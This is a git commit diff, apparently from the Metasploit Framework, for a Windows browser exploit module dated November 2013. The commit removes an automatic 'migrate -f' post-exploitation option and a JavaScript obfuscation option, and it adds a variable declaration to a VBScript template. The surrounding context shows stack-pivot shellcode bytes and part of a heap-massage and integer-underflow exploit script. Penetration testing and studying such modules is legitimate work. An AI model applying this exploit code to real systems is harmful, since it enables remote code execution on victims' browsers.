Disable auto migrate

bug/bundler_fix
jvazquez-r7 2013-11-18 08:54:22 -06:00
parent cbb7eb192c
commit 237bb22771
1 changed files with 1 additions and 9 deletions

View File

@ -56,10 +56,6 @@ class Metasploit3 < Msf::Exploit::Remote
"\x8b\x20" + # mov esp, [eax]
"\x81\xC4\x30\xF8\xFF\xFF", # add esp, -2000
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'BrowserRequirements' =>
{
@ -83,11 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote
'DisclosureDate' => "Nov 08 2013",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class
)
end
def exploit_template(cli, target_info)
@ -124,6 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
</script>
<script language='vbscript'>
On Error Resume Next
Dim <%=symbols["massage_array_length"]%>,<%=symbols["underflow"]%>,<%=symbols["zero"]%>
Dim <%=symbols["massage_array"]%>(5493)
<%=symbols["massage_array_length"]%> = 5493
<%=symbols["underflow"]%> = -7